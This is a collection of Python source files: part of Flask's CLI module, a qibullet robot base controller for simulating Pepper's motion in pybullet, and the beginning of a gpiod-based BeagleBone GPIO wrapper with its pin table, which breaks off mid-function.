ctx.update(app.make_shell_context())
code.interact(banner=banner, local=ctx)
@click.command('routes', short_help='Show the routes for the app.')
@click.option(
'--sort', '-s',
type=click.Choice(('endpoint', 'methods', 'rule', 'match')),
default='endpoint',
help=(
'Method to sort routes by. "match" is the order that Flask will match '
'routes when dispatching a request.'
)
)
@click.option(
'--all-methods',
is_flag=True,
help="Show HEAD and OPTIONS methods."
)
@with_appcontext
def routes_command(sort, all_methods):
"""Show all registered routes with endpoints and methods."""
rules = list(current_app.url_map.iter_rules())
if not rules:
click.echo('No routes were registered.')
return
ignored_methods = set(() if all_methods else ('HEAD', 'OPTIONS'))
if sort in ('endpoint', 'rule'):
rules = sorted(rules, key=attrgetter(sort))
elif sort == 'methods':
rules = sorted(rules, key=lambda rule: sorted(rule.methods))
rule_methods = [
', '.join(sorted(rule.methods - ignored_methods)) for rule in rules
]
headers = ('Endpoint', 'Methods', 'Rule')
widths = (
max(len(rule.endpoint) for rule in rules),
max(len(methods) for methods in rule_methods),
max(len(rule.rule) for rule in rules),
)
widths = [max(len(h), w) for h, w in zip(headers, widths)]
row = '{{0:<{0}}} {{1:<{1}}} {{2:<{2}}}'.format(*widths)
click.echo(row.format(*headers).strip())
click.echo(row.format(*('-' * width for width in widths)))
for rule, methods in zip(rules, rule_methods):
click.echo(row.format(rule.endpoint, methods, rule.rule).rstrip())
cli = FlaskGroup(help="""\
A general utility script for Flask applications.
Provides commands from Flask, extensions, and the application. Loads the
application defined in the FLASK_APP environment variable, or from a wsgi.py
file. Setting the FLASK_ENV environment variable to 'development' will enable
debug mode.
\b
{prefix}{cmd} FLASK_APP=hello.py
{prefix}{cmd} FLASK_ENV=development
{prefix}flask run
""".format(
cmd='export' if os.name == 'posix' else 'set',
prefix='$ ' if os.name == 'posix' else '> '
))
def main(as_module=False):
args = sys.argv[1:]
if as_module:
this_module = 'flask'
if sys.version_info < (2, 7):
this_module += '.cli'
name = 'python -m ' + this_module
# Python rewrites "python -m flask" to the path to the file in argv.
# Restore the original command so that the reloader works.
sys.argv = ['-m', this_module] + args
else:
name = None
cli.main(args=args, prog_name=name)
if __name__ == '__main__':
main(as_module=True)
|
base_controller.py
|
#!/usr/bin/env python
# coding: utf-8
import time
import atexit
import weakref
import pybullet
import threading
from qibullet.tools import *
from qibullet.controller import Controller
class BaseController(Controller):
"""
Class describing a robot base controller
"""
# _instances = set()
FRAME_WORLD = 1
FRAME_ROBOT = 2
def __init__(self, robot_model, physicsClientId=0):
"""
Constructor
Parameters:
robot_model - the pybullet model of the robot
physicsClientId - The id of the simulated instance in which the
robot will be controlled
"""
Controller.__init__(self, robot_model, physicsClientId)
self.linear_velocity = 0
self.angular_velocity = 0
self.linear_acceleration = 0
self.angular_acceleration = 0
self.frame = BaseController.FRAME_ROBOT
self.pose_init = {}
self.pose_goal = {}
def _setGoal(self, x, y, theta, frame):
"""
INTERNAL METHOD, set the position of the goal to a specific frame.
Parameters:
x - position of the goal on the x axis, in meters
y - position of the goal on the y axis, in meters
theta - orientation of the goal around the z axis, in radians
frame - The frame in which the goal is expressed: FRAME_WORLD = 1,
FRAME_ROBOT = 2
"""
self.goal = [x, y, theta]
self.frame = frame
def _updateGoal(self):
"""
INTERNAL METHOD, update the position of the goal.
"""
# get actual position in frame world
actual_pos, actual_orn = pybullet.getBasePositionAndOrientation(
self.robot_model,
physicsClientId=self.physics_client)
x, y, theta = self.goal
# pose x, y, z
pose_requested = [x, y, 0]
# orientation requested (euler)
orn_requested = [0, 0, theta]
# if we are in frame robot express the position in the frame world
if self.frame == BaseController.FRAME_ROBOT:
orn_euler = pybullet.getEulerFromQuaternion(actual_orn)
pose_requested = [
pose_requested[0] * math.cos(orn_euler[2])
- pose_requested[1] * math.sin(orn_euler[2])
+ actual_pos[0],
pose_requested[0] * math.sin(orn_euler[2])
+ pose_requested[1] * math.cos(orn_euler[2])
+ actual_pos[1],
0]
orn_requested = [
orn_euler[0],
orn_euler[1],
orn_euler[2] + theta]
self.pose_goal["position"] = pose_requested
self.pose_goal["orientation"] = orn_requested
def setLinearVelocity(self, linear_velocity):
"""
Set the linear velocity.
Parameter:
linear_velocity : The linear velocity value in m/s
"""
self.linear_velocity = linear_velocity
def _setAngularVelocity(self, angular_velocity):
"""
INTERNAL METHOD, set the angular velocity.
Parameter:
angular_velocity : The angular velocity value in rad/s
"""
self.angular_velocity = angular_velocity
def _setLinearAcceleration(self, linear_acceleration):
"""
INTERNAL METHOD, set the linear acceleration.
Parameter:
linear_acceleration : The linear acceleration value in m/s^2
"""
self.linear_acceleration = linear_acceleration
def _setAngularAcceleration(self, angular_acceleration):
"""
INTERNAL METHOD, set the angular acceleration.
Parameter:
angular_acceleration : The angular acceleration value in rad/s^2
"""
self.angular_acceleration = angular_acceleration
class PepperBaseController(BaseController):
"""
Class describing a Pepper base controller
"""
MAX_LINEAR_VELOCITY = 0.55
MIN_LINEAR_VELOCITY = 0.1
MAX_ANGULAR_VELOCITY = 2.0
MIN_ANGULAR_VELOCITY = 0.3
MAX_LINEAR_ACCELERATION = 0.55
MIN_LINEAR_ACCELERATION = 0.1
MAX_ANGULAR_ACCELERATION = 3.0
MIN_ANGULAR_ACCELERATION = 0.1
def __init__(
self,
robot_model,
speed,
acceleration,
motion_constraint,
physicsClientId=0):
"""
Constructor
Parameters:
robot_model - the pybullet model of the robot
speed - list containing the linear velocity and the angular
velocity values, in m/s
acceleration - list containing the linear acceleration and angular
acceleration values, in m/s^2
motion_constraint - the pybullet motion constraint applied on the
robot
physicsClientId - The id of the simulated instance in which Pepper
will be controlled
"""
BaseController.__init__(
self,
robot_model,
physicsClientId=physicsClientId)
# Set the different speeds and accelerations
self.setLinearVelocity(speed[0])
self._setAngularVelocity(speed[1])
self._setLinearAcceleration(acceleration[0])
self._setAngularAcceleration(acceleration[1])
# force applied in the movement
self.force = 100
        # The robot will stop the movement with a precision of 0.01 m and
        # 0.02 rad
self.linear_threshold = 0.01
self.angular_threshold = 0.02
self.motion_constraint = motion_constraint
def setLinearVelocity(self, linear_velocity):
"""
Set the linear velocity.
Parameter:
linear_velocity : The linear velocity value in m/s
"""
if linear_velocity > PepperBaseController.MAX_LINEAR_VELOCITY:
linear_velocity = PepperBaseController.MAX_LINEAR_VELOCITY
elif linear_velocity < PepperBaseController.MIN_LINEAR_VELOCITY:
linear_velocity = PepperBaseController.MIN_LINEAR_VELOCITY
BaseController.setLinearVelocity(self, linear_velocity)
def _setAngularVelocity(self, angular_velocity):
"""
INTERNAL METHOD, set the angular velocity.
Parameter:
angular_velocity : The angular velocity value in rad/s
"""
if angular_velocity > PepperBaseController.MAX_ANGULAR_VELOCITY:
angular_velocity = PepperBaseController.MAX_ANGULAR_VELOCITY
elif angular_velocity < PepperBaseController.MIN_ANGULAR_VELOCITY:
angular_velocity = PepperBaseController.MIN_ANGULAR_VELOCITY
BaseController._setAngularVelocity(self, angular_velocity)
def _setLinearAcceleration(self, linear_acceleration):
"""
INTERNAL METHOD, set the linear acceleration.
Parameter:
linear_acceleration : The linear acceleration value in m/s^2
"""
if linear_acceleration > PepperBaseController.MAX_LINEAR_ACCELERATION:
linear_acceleration = PepperBaseController.MAX_LINEAR_ACCELERATION
elif linear_acceleration <\
PepperBaseController.MIN_LINEAR_ACCELERATION:
linear_acceleration = PepperBaseController.MIN_LINEAR_ACCELERATION
BaseController._setLinearAcceleration(self, linear_acceleration)
def _setAngularAcceleration(self, angular_acceleration):
"""
INTERNAL METHOD, set the angular acceleration.
Parameter:
angular_acceleration : The angular acceleration value in rad/s^2
"""
if angular_acceleration >\
PepperBaseController.MAX_ANGULAR_ACCELERATION:
angular_acceleration =\
PepperBaseController.MAX_ANGULAR_ACCELERATION
elif angular_acceleration <\
PepperBaseController.MIN_ANGULAR_ACCELERATION:
angular_acceleration =\
PepperBaseController.MIN_ANGULAR_ACCELERATION
BaseController._setAngularAcceleration(self, angular_acceleration)
def moveTo(self, x, y, theta, frame, _async=False):
"""
Move the robot in frame world or robot (FRAME_WORLD=1, FRAME_ROBOT=2).
        This method can be called synchronously or asynchronously. In
        asynchronous mode, the method can be called again while a motion is
        already running; doing so updates the goal of the motion.
Parameters:
x - position of the goal on the x axis, in meters
y - position of the goal on the y axis, in meters
theta - orientation of the goal around the z axis, in radians
frame - The frame in which the goal is expressed: FRAME_WORLD = 1,
FRAME_ROBOT = 2
_async - The method is launched in async mode if True, in synch
mode if False (False by default)
"""
self._setGoal(x, y, theta, frame)
if self.module_process.isAlive():
if _async is False:
raise pybullet.error(
"Already a moveTo asynchronous. Can't "
"launch moveTo synchronous")
self._initProcess()
elif _async:
self.module_process = threading.Thread(target=self._moveToProcess)
self.module_process.start()
else:
self._moveToProcess()
def move(self, x, y, theta):
"""
Apply a speed on the robot's base.
Parameters:
x - Speed on the x axis, in m/s
y - Speed on the y axis, in m/s
theta - Rotational speed around the z axis, in rad/s
"""
# Kill any previous moveTo process running
self.moveTo(0, 0, 0, frame=BaseController.FRAME_ROBOT, _async=True)
        # Bound the velocity. The max acceleration is not taken into account
        # here; this is a potential improvement
if abs(x) > PepperBaseController.MAX_LINEAR_VELOCITY:
x = PepperBaseController.MAX_LINEAR_VELOCITY * (x/abs(x))
if abs(y) > PepperBaseController.MAX_LINEAR_VELOCITY:
y = PepperBaseController.MAX_LINEAR_VELOCITY * (y/abs(y))
if abs(theta) > PepperBaseController.MAX_ANGULAR_VELOCITY:
theta = PepperBaseController.MAX_ANGULAR_VELOCITY *\
(theta/abs(theta))
actual_pos, actual_orn = pybullet.getBasePositionAndOrientation(
self.robot_model,
physicsClientId=self.physics_client)
# convert actual_orn into euler
actual_orn = pybullet.getEulerFromQuaternion(actual_orn)
linear_world_velocity = [
x * math.cos(actual_orn[2]) - y * math.sin(actual_orn[2]),
x * math.sin(actual_orn[2]) + y * math.cos(actual_orn[2]),
0]
time.sleep(0.02)
pybullet.resetBaseVelocity(
self.robot_model,
linear_world_velocity,
[0, 0, theta],
physicsClientId=self.physics_client)
def stopMove(self):
"""
        If an asynchronous moveTo has been launched, calling this method will
stop the asynchronous process. Calling this method is equivalent to
calling moveTo(0.0, 0.0, 0.0, BaseController.FRAME_ROBOT, _async=True)
"""
self.moveTo(0.0, 0.0, 0.0, BaseController.FRAME_ROBOT, _async=True)
def _updateConstraint(self):
"""
INTERNAL METHOD, update the robot's constraint.
"""
# Change the constraint to the requested position and orientation
pybullet.changeConstraint(
self.motion_constraint,
self.pose_goal["position"],
jointChildFrameOrientation=pybullet.getQuaternionFromEuler(
self.pose_goal["orientation"]),
maxForce=self.force,
physicsClientId=self.physics_client)
def _initProcess(self):
"""
INTERNAL METHOD, initialize the motion process and all variables
needed.
"""
# Get actual position in frame world
self.pose_init["position"], self.pose_init["orientation"] =\
pybullet.getBasePositionAndOrientation(
self.robot_model,
physicsClientId=self.physics_client)
# convert pose_init orientation in orn_euler
self.pose_init["orientation"] = pybullet.getEulerFromQuaternion(
self.pose_init["orientation"]
)
self._updateGoal()
self._updateConstraint()
        # Compute, per axis, the ratio of the requested displacement over the
        # total distance (unit direction of the motion)
distance = getDistance(
self.pose_init["position"],
self.pose_goal["position"])
self.p_x = 0
self.p_y = 0
self.p_theta = 0
if distance:
self.p_x = (
self.pose_goal["position"][0] -
self.pose_init["position"][0]) / distance
self.p_y = (
self.pose_goal["position"][1] -
self.pose_init["position"][1]) / distance
theta_to_do = getOrientation(
self.pose_init["orientation"],
self.pose_goal["orientation"])
if abs(theta_to_do):
self.p_theta = abs(theta_to_do) / theta_to_do
def _endProcess(self):
"""
INTERNAL METHOD, stop the robot movement.
"""
# Change the constraint to the actual position and orientation in
# order to stop the robot's motion. The force applied is purposely huge
# to avoid oscillations.
actual_pos, actual_orn = pybullet.getBasePositionAndOrientation(
self.robot_model,
physicsClientId=self.physics_client)
pybullet.changeConstraint(
self.motion_constraint,
actual_pos,
jointChildFrameOrientation=actual_orn,
maxForce=self.force * 10,
physicsClientId=self.physics_client)
pybullet.resetBaseVelocity(
self.robot_model,
[0, 0, 0],
[0, 0, 0],
physicsClientId=self.physics_client)
def _moveToProcess(self):
"""
INTERNAL METHOD, process allowing to move the robot's base.
"""
self._initProcess()
# actual_pos = self.pose_init["position"]
# actual_orn = self.pose_init["orientation"]
init_pos = self.pose_init["position"]
init_orn = self.pose_init["orientation"]
actual_pos = init_pos
actual_orn = init_orn
while not self._module_termination:
translation_distance = getDistance(
actual_pos,
self.pose_goal["position"])
# Modulo the orientation pose goal with conversion in quaternion
modulo_quater_pose_goal = pybullet.getQuaternionFromEuler(
self.pose_goal["orientation"])
# Conversion into euler
modulo_euler_pose_goal = pybullet.getEulerFromQuaternion(
modulo_quater_pose_goal)
rotation_distance = abs(getOrientation(
actual_orn,
modulo_euler_pose_goal))
if translation_distance < self.linear_threshold and\
rotation_distance < self.angular_threshold:
break
actual_pos, actual_orn = pybullet.getBasePositionAndOrientation(
self.robot_model,
physicsClientId=self.physics_client)
# convert actual_orn into euler
actual_orn = pybullet.getEulerFromQuaternion(actual_orn)
linear_vel_x = computeVelocity(
self.linear_acceleration,
0.05,
self.linear_velocity,
getDistance(actual_pos, init_pos),
getDistance(actual_pos, self.pose_goal["position"]))
linear_vel_y = linear_vel_x
angular_vel = computeVelocity(
self.angular_acceleration,
0.05,
self.angular_velocity,
abs(getOrientation(
init_orn,
actual_orn)),
abs(getOrientation(
actual_orn,
self.pose_goal["orientation"])))
            # If the robot is at the requested position, set the velocity
            # to 0.
if abs(actual_pos[0] - self.pose_goal["position"][0]) <=\
self.linear_threshold / 2:
linear_vel_x = 0
if abs(actual_pos[1] - self.pose_goal["position"][1]) <=\
self.linear_threshold / 2:
linear_vel_y = 0
if abs(getOrientation(
actual_orn, self.pose_goal["orientation"])) <=\
self.angular_threshold:
angular_vel = 0
# Reset the velocity of the robot
time.sleep(0.02)
pybullet.resetBaseVelocity(
self.robot_model,
[linear_vel_x * self.p_x, linear_vel_y * self.p_y, 0],
[0, 0, angular_vel * self.p_theta],
physicsClientId=self.physics_client)
self._endProcess()
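# Minimal usage sketch (not executed here). It assumes a PepperBaseController
# already built by the simulation layer with a valid robot model, speed and
# acceleration lists, and motion constraint.
def _example_base_motion(base_controller):
    # Blocking 1 m forward translation in the robot frame
    base_controller.moveTo(1.0, 0.0, 0.0, BaseController.FRAME_ROBOT)
    # Non-blocking rotation of pi/2 rad in the world frame; the goal can be
    # updated by calling moveTo again while the motion is running
    base_controller.moveTo(0.0, 0.0, math.pi / 2,
                           BaseController.FRAME_WORLD, _async=True)
    base_controller.stopMove()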
|
GPIOmay.py
|
#!/usr/bin/env python3
"""
Copyright (c) 2013 Adafruit
Original RPi.GPIO Py-Wrapper Author Ben Croston
Modified for BBIO Py-Wrapper Author Justin Cooper
Authors of Full Python Implementation: Mark Yoder, Joshua Key, and Eric Morse
This file incorporates work covered by the following copyright and
permission notice, all modified code adopts the original license:
Copyright (c) 2013 Ben Croston
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
of the Software, and to permit persons to whom the Software is furnished to do
so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
"""gpiod-based GPIO functionality of a BeagleBone using Python."""
import gpiod
import sys
#import multiprocessing
from multiprocessing import Pipe, Process
# import select
import time
ALT0 = 4
BOTH = 3
FALLING = 2
HIGH = 1
IN = 0
LOW = 0
OUT = 1
PUD_DOWN = 1
PUD_OFF = 0
PUD_UP = 2
RISING = 1
VERSION = '0.0.0'
threads=[]
ports={} # Dictionary of channel/line pairs that are open
CONSUMER='GPIOmay'
parent_conn = []
gChannel = []
gChannelNames = []
# Table generated based on https://github.com/jadonk/bonescript/blob/master/src/bone.js
table = [
[ "USR0", "USR0", 53, -1, -1, "GPMC_A5"],
[ "USR1", "USR1", 54, -1, -1, "GPMC_A6"],
[ "USR2", "USR2", 55, -1, -1, "GPMC_A7"],
[ "USR3", "USR3", 56, -1, -1, "GPMC_A8"],
[ "DGND", "P8_1", 0, -1, -1, "unused"],
[ "DGND", "P8_2", 0, -1, -1, "unused"],
[ "GPIO1_6", "P8_3", 38, -1, -1, "GPMC_AD6"],
[ "GPIO1_7", "P8_4", 39, -1, -1, "GPMC_AD7"],
[ "GPIO1_2", "P8_5", 34, -1, -1, "GPMC_AD2"],
[ "GPIO1_3", "P8_6", 35, -1, -1, "GPMC_AD3"],
[ "TIMER4", "P8_7", 66, 2, -1, "GPMC_ADVN_ALE"],
[ "TIMER7", "P8_8", 67, 2, -1, "GPMC_OEN_REN"],
[ "TIMER5", "P8_9", 69, 2, -1, "GPMC_BEON_CLE"],
[ "TIMER6", "P8_10", 68, 2, -1, "GPMC_WEN"],
[ "GPIO1_13", "P8_11", 45, -1, -1, "GPMC_AD13"],
[ "GPIO1_12", "P8_12", 44, -1, -1, "GPMC_AD12"],
[ "EHRPWM2B", "P8_13", 23, 4, -1, "GPMC_AD9"],
[ "GPIO0_26", "P8_14", 26, -1, -1, "GPMC_AD10"],
[ "GPIO1_15", "P8_15", 47, -1, -1, "GPMC_AD15"],
[ "GPIO1_14", "P8_16", 46, -1, -1, "GPMC_AD14"],
[ "GPIO0_27", "P8_17", 27, -1, -1, "GPMC_AD11"],
[ "GPIO2_1", "P8_18", 65, -1, -1, "GPMC_DK_MUX0"],
[ "EHRPWM2A", "P8_19", 22, 4, -1, "GPMC_AD8"],
[ "GPIO1_31", "P8_20", 63, -1, -1, "GPMC_CSN2"],
[ "GPIO1_30", "P8_21", 62, -1, -1, "GPMC_CSN1"],
[ "GPIO1_5", "P8_22", 37, -1, -1, "GPMC_AD5"],
[ "GPIO1_4", "P8_23", 36, -1, -1, "GPMC_AD4"],
[ "GPIO1_1", "P8_24", 33, -1, -1, "GPMC_AD1"],
[ "GPIO1_0", "P8_25", 32, -1, -1, "GPMC_AD0"],
[ "GPIO1_29", "P8_26", 61, -1, -1, "GPMC_CSN0"],
[ "GPIO2_22", "P8_27", 86, -1, -1, "LCD_VSYNC"],
[ "GPIO2_24", "P8_28", 88, -1, -1, "LCD_PCLK"],
[ "GPIO2_23", "P8_29", 87, -1, -1, "LCD_HSYNC"],
[ "GPIO2_25", "P8_30", 89, -1, -1, "LCD_AC_BIAS_EN"],
[ "UART5_CTSN", "P8_31", 10, -1, -1, "LCD_DATA14"],
[ "UART5_RTSN", "P8_32", 11, -1, -1, "LCD_DATA15"],
[ "UART4_RTSN", "P8_33", 9, -1, -1, "LCD_DATA13"],
[ "UART3_RTSN", "P8_34", 81, 2, -1, "LCD_DATA11"],
[ "UART4_CTSN", "P8_35", 8, -1, -1, "LCD_DATA12"],
[ "UART3_CTSN", "P8_36", 80, 2, -1, "LCD_DATA10"],
[ "UART5_TXD", "P8_37", 78, -1, -1, "LCD_DATA8"],
[ "UART5_RXD", "P8_38", 79, -1, -1, "LCD_DATA9"],
[ "GPIO2_12", "P8_39", 76, -1, -1, "LCD_DATA6"],
[ "GPIO2_13", "P8_40", 77, -1, -1, "LCD_DATA7"],
[ "GPIO2_10", "P8_41", 74, -1, -1, "LCD_DATA4"],
[ "GPIO2_11", "P8_42", 75, -1, -1, "LCD_DATA5"],
[ "GPIO2_8", "P8_43", 72, -1, -1, "LCD_DATA2"],
[ "GPIO2_9", "P8_44", 73, -1, -1, "LCD_DATA3"],
[ "GPIO2_6", "P8_45", 70, 3, -1, "LCD_DATA0"],
[ "GPIO2_7", "P8_46", 71, 3, -1, "LCD_DATA1"],
[ "DGND", "P9_1", 0, -1, -1, "unused"],
[ "DGND", "P9_2", 0, -1, -1, "unused"],
[ "VDD_3V3", "P9_3", 0, -1, -1, "unused"],
[ "VDD_3V3", "P9_4", 0, -1, -1, "unused"],
[ "VDD_5V", "P9_5", 0, -1, -1, "unused"],
[ "VDD_5V", "P9_6", 0, -1, -1, "unused"],
[ "SYS_5V", "P9_7", 0, -1, -1, "unused"],
[ "SYS_5V", "P9_8", 0, -1, -1, "unused"],
[ "PWR_BUT", "P9_9", 0, -1, -1, "unused"],
[ "SYS_RESETn", "P9_10", 0, -1, -1, "unused"],
[ "UART4_RXD", "P9_11", 30, -1, -1, "GPMC_WAIT0"],
[ "GPIO1_28", "P9_12", 60, -1, -1, "GPMC_BEN1"],
[ "UART4_TXD", "P9_13", 31, -1, -1, "GPMC_WPN"],
[ "EHRPWM1A", "P9_14", 50, 6, -1, "GPMC_A2"],
[ "GPIO1_16", "P9_15", 48, -1, -1, "GPMC_A0"],
[ "EHRPWM1B", "P9_16", 51, 6, -1, "GPMC_A3"],
[ "I2C1_SCL", "P9_17", 5, -1, -1, "SPI0_CS0"],
[ "I2C1_SDA", "P9_18", 4, -1, -1, "SPI0_D1"],
[ "I2C2_SCL", "P9_19", 13, -1, -1, "UART1_RTSN"],
[ "I2C2_SDA", "P9_20", 12, -1, -1, "UART1_CTSN"],
[ "UART2_TXD", "P9_21", 3, 3, -1, "SPI0_D0"],
[ "UART2_RXD", "P9_22", 2, 3, -1, "SPI0_SCLK"],
[ "GPIO1_17", "P9_23", 49, -1, -1, "GPMC_A1"],
[ "UART1_TXD", "P9_24", 15, -1, -1, "UART1_TXD"],
[ "GPIO3_21", "P9_25", 117, -1, -1, "MCASP0_AHCLKX"],
[ "UART1_RXD", "P9_26", 14, -1, -1, "UART1_RXD"],
[ "GPIO3_19", "P9_27", 115, -1, -1, "MCASP0_FSR"],
[ "SPI1_CS0", "P9_28", 113, 4, -1, "MCASP0_AHCLKR"],
[ "SPI1_D0", "P9_29", 111, 1, -1, "MCASP0_FSX"],
[ "SPI1_D1", "P9_30", 112, -1, -1, "MCASP0_AXR0"],
[ "SPI1_SCLK", "P9_31", 110, 1, -1, "MCASP0_ACLKX"],
[ "VDD_ADC", "P9_32", 0, -1, -1, "unused"],
[ "AIN4", "P9_33", 0, -1, 4, "unused"],
[ "GNDA_ADC", "P9_34", 0, -1, -1, "uused"],
[ "AIN6", "P9_35", 0, -1, 6, "unused"],
[ "AIN5", "P9_36", 0, -1, 5, "unused"],
[ "AIN2", "P9_37", 0, -1, 2, "unused"],
[ "AIN3", "P9_38", 0, -1, 3, "unused"],
[ "AIN0", "P9_39", 0, -1, 0, "unused"],
[ "AIN1", "P9_40", 0, -1, 1, "unused"],
[ "CLKOUT2", "P9_41", 20, -1, -1, "XDMA_EVENT_INTR1"],
[ "GPIO0_7", "P9_42", 7, 0, -1, "ECAP0_IN_PWM0_OUT"],
[ "DGND", "P9_43", 0, -1, -1, "unused"],
[ "DGND", "P9_44", 0, -1, -1, "unused"],
[ "DGND", "P9_45", 0, -1, -1, "unused"],
[ "DGND", "P9_46", 0, -1, -1, "unused"],
# Commented out Blue and PocketBeagle since our project doesn't use them
# These are for the Blue
#[ "GP0_3", "GP0_3", 57, -1, -1, "blue"],
#[ "GP0_4", "GP0_4", 49, -1, -1, "blue"],
#[ "GP0_5", "GP0_5", 116, -1, -1, "blue"],
#[ "GP0_6", "GP0_6", 113, -1, -1, "blue"],
#[ "GP1_3", "GP1_3", 98, -1, -1],
#[ "GP1_4", "GP1_4", 97, -1, -1],
#[ "RED_LED", "RED", 66, -1, -1], # LEDs
#[ "GREEN_LED", "GREEN", 67, -1, -1],
#[ "BAT25", "BAT25", 27, -1, -1],
#[ "BAT50", "BAT50", 11, -1, -1],
#[ "BAT75", "BAT75", 61, -1, -1],
#[ "BAT100", "BAT100", 10000, -1, -1], # Placeholder
#[ "WIFI", "WIFI", 10001, -1, -1], # Placeholder
#[ "PAUSE", "P8_9", 69, 1, -1],
#[ "MODE", "P8_10", 68, 1, -1],
# These are for the PocketBeagle
#[ "VIN_AC", "P1_1", 0, -1, -1],
#[ "GPIO2_23", "P1_2", 87, -1, -1],
#[ "USB1_DRVVBUS", "P1_3", 0, -1, -1],
#[ "GPIO2_25", "P1_4", 89, -1, -1],
#[ "USB1_VBUS_IN", "P1_5", 0, -1, -1],
#[ "SPI0_CS0", "P1_6", 5, -1, -1],
#[ "VIN-USB", "P1_7", 0, -1, -1],
#[ "SPI0_SCLK", "P1_8", 2, 3, -1],
#[ "USB1-DN", "P1_9", 0, -1, -1],
#[ "SPI0_D0", "P1_10", 3, 3, -1],
#[ "USB1-DP", "P1_11", 0, -1, -1],
#[ "SPI0_D1", "P1_12", 4, -1, -1],
#[ "USB1-ID", "P1_13", 0, -1, -1],
#[ "VOUT-3.3V", "P1_14", 0, -1, -1],
#[ "GND", "P1_15", 0, -1, -1],
#[ "GND", "P1_16", 0, -1, -1],
#[ "VREFN", "P1_17", 0, -1, -1],
#[ "VREFP", "P1_18", 0, -1, -1],
#[ "AIN0", "P1_19", 0, -1, 0],
#[ "GPIO0_20", "P1_20", 20, 4, -1],
#[ "AIN1", "P1_21", 0, -1, 1],
#[ "GND", "P1_22", 0, -1, -1],
#[ "AIN2", "P1_23", 0, -1, 2],
#[ "VOUT-5V", "P1_24", 0, -1, -1],
#[ "AIN3", "P1_25", 0, -1, 3],
#[ "I2C2_SDA", "P1_26", 12, 1, -1],
#[ "AIN4", "P1_27", 0, -1, 4],
#[ "I2C2_SCL", "P1_28", 13, 1, -1],
#[ "GPIO3_21", "P1_29", 117, -1, -1],
#[ "UART0_TXD", "P1_30", 43, -1, -1],
#[ "GPIO3_18", "P1_31", 114, -1, -1],
#[ "UART0_RXD", "P1_32", 42, -1, -1],
#[ "GPIO3_15", "P1_33", 111, 1, -1],
#[ "GPIO0_26", "P1_34", 26, -1, -1],
#[ "GPIO2_24", "P1_35", 88, -1, -1],
#[ "EHRPWM0A", "P1_36", 110, 1, -1],
#[ "EHRPWM1A", "P2_1", 50, 6, -1],
#[ "GPIO1_27", "P2_2", 59, -1, -1],
#[ "GPIO0_23", "P2_3", 23, 4, -1],
#[ "GPIO1_26", "P2_4", 58, -1, -1],
#[ "UART4_RXD", "P2_5", 30, -1, -1],
#[ "GPIO1_25", "P2_6", 57, -1, -1],
#[ "UART4_TXD", "P2_7", 31, -1, -1],
#[ "GPIO1_28", "P2_8", 60, -1, -1],
#[ "I2C1_SCL", "P2_9", 15, -1, -1],
#[ "GPIO1_20", "P2_10", 52, -1, -1],
#[ "I2C1_SDA", "P2_11", 14, -1, -1],
#[ "POWER_BUTTON", "P2_12", 0, -1, -1],
#[ "VOUT-5V", "P2_13", 0, -1, -1],
#[ "BAT-VIN", "P2_14", 0, -1, -1],
#[ "GND", "P2_15", 0, -1, -1],
#[ "BAT-TEMP", "P2_16", 0, -1, -1],
#[ "GPIO2_1", "P2_17", 65, -1, -1],
#[ "GPIO1_15", "P2_18", 47, -1, -1],
#[ "GPIO0_27", "P2_19", 27, -1, -1],
#[ "GPIO2_0", "P2_20", 64, -1, -1],
#[ "GND", "P2_21", 0, -1, -1],
#[ "GPIO1_14", "P2_22", 46, -1, -1],
#[ "VOUT-3.3V", "P2_23", 0, -1, -1],
#[ "GPIO1_12", "P2_24", 44, -1, -1],
#[ "SPI1_CS0", "P2_25", 41, -1, -1],
#[ "RESET#", "P2_26", 0, -1, -1],
#[ "SPI1_D0", "P2_27", 40, 5, -1],
#[ "GPIO3_20", "P2_28", 116, -1, -1],
#[ "SPI1_SCLK", "P2_29", 7, -1, -1],
#[ "GPIO3_17", "P2_30", 113, -1, -1],
#[ "SPI1_CS1", "P2_31", 19, 2, -1],
#[ "GPIO3_16", "P2_32", 112, -1, -1],
#[ "GPIO1_13", "P2_33", 45, -1, -1],
#[ "GPIO3_19", "P2_34", 115, -1, -1],
#[ "GPIO2_22", "P2_35", 86, -1, -1],
#[ "AIN7", "P2_36", 0, -1, 7],
[ None, None, 0, 0, 0, "unused" ]
]
def channelNameConvert(channel):
global gChannel
global gChannelNames
for i in range(0, len(gChannel)):
if channel == gChannelNames[i]:
return gChannel[i]
print("Error: name not found")
return "error"
def run(channel, edge, callback=None, debounce=0, child_conn=None):
channel = channelNameConvert(channel)
thread_go = True
while thread_go:
event_detected = None
thread_go = wait_for_edge(channel, edge, child_conn)
if thread_go:
time.sleep(debounce/1000000.0)
callback(channel)
#thread_go = not child_conn.poll()
#if not thread_go:
# child_conn.close()
def setup(channel, direction):
"""Set up the GPIO channel, direction and (optional) pull/up down control.
channel - channel can be in the form of 'P8_10', or 'EHRPWM2A'
direction - INPUT or OUTPUT
[pull_up_down] - PUD_OFF (default), PUD_UP or PUD_DOWN
[initial] - Initial value for an output channel
[delay] - Time in milliseconds to wait after exporting gpio pin"""
global gChannel
global gChannelNames
for index in table:
if index[1] == channel:
channel = index[5]
gChannel.append(index[5])
gChannelNames.append(index[1])
break
elif index[0] == channel:
channel = index[5]
gChannel.append(index[5])
gChannelNames.append(index[0])
break
elif index[5] == channel:
gChannel.append(index[5])
gChannelNames.append(index[5])
found=0
# Search for the channel in either the line name or the consumer
for chip in gpiod.ChipIter():
# print('{} - {} lines:'.format(chip.name(), chip.num_lines()))
for line in gpiod.LineIter(chip):
offset = line.offset()
name = line.name()
consumer = line.consumer()
linedirection = line.direction()
active_state = line.active_state()
if name == channel or consumer == channel:
# print('{}\tline {:>3}: {:>18} {:>12} {:>8} {:>10}'.format(
